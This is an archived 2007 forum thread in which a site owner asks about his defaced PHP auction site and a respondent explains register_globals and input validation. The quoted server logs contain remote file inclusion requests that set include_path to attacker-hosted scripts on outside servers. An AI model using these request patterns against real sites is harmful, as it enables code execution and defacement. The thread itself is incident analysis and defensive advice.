|
|
Posted by Jerry Stuckle on 10/16/07 02:42
Charles Crume wrote:
> Hi Jerry;
>
> Thanks!!!
>
> I am using an auction software package the *requires* register_globals to be
> enabled. I took a look at my PHP.INI file and saw where I had changed this
> setting years ago (had put some comments as to what, why, and when the
> change was made in the file).
>
> I have turned register_globals off (of course the auction software no longer
> works) until I figure out what to do.
>
> Thanks again for your help!
>
> Charles...
>
>
>
>
> "Jerry Stuckle" <jstucklex@attglobal.net> wrote in message
> news:D7-dnQ0RJ6npTY_anZ2dnUVZ_gOdnZ2d@comcast.com...
>> Charles Crume wrote:
>>> Hello Everyone;
>>>
>>> My site was hacked the other day -- someone was able to rename my
>>> index.shtml file and put their own index.html file on my server. Not sure
>>> how it was done, but looking through the log file, I found a lots and
>>> lots of entries where an "include_path" parameter was included in the URL
>>> of the PHP page, as shown below:
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1"
>>> 404 310 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1"
>>> 404 310 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>>> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>>> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>>> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>>
>>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>>> what the effect of including it in the URL. A number of entries show a
>>> code 404 as the culprits are obviously phising for pages, but requests
>>> with return code 200 are showing a large number of bytes transferred --
>>> far larger than the PHP page itself.
>>>
>>> Can someone explain what adding "include_path" to a URL does?
>>>
>>> Is there something I need to check on my server of how I've got Apache
>>> configured?
>>>
>>> TIA.
>>>
>>> Charles...
>>>
>>>
>>>
>> The include_path itself in the url is just a variable. It's what you do
>> with it that's important. For instance, if you have register_globals
>> enabled, the include_path in the URL may override the system include_path.
>>
>> Or, depending on what else you do in your code. This is a big reason why
>> it's good to use $_POST instead of $_REQUEST if you're posting a form to a
>> page - $_POST will ignore any $_GET parameters.
>>
>> And just another reason to *ALWAYS* validate data coming from the user.
>>
>> --
>> ==================
>> Remove the "x" from my email address
>> Jerry Stuckle
>> JDS Computer Training Corp.
>> jstucklex@attglobal.net
>> ==================
>>
>
>
>
If your software is so old that it requires register_globals, it
probably has other security holes, also.
If they don't have an upgraded version, I'd suggest you find another
package. Otherwise, chances are you'll have this happen again.
Especially since they now know you're vulnerable.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================
Navigation:
[Reply to this message]
|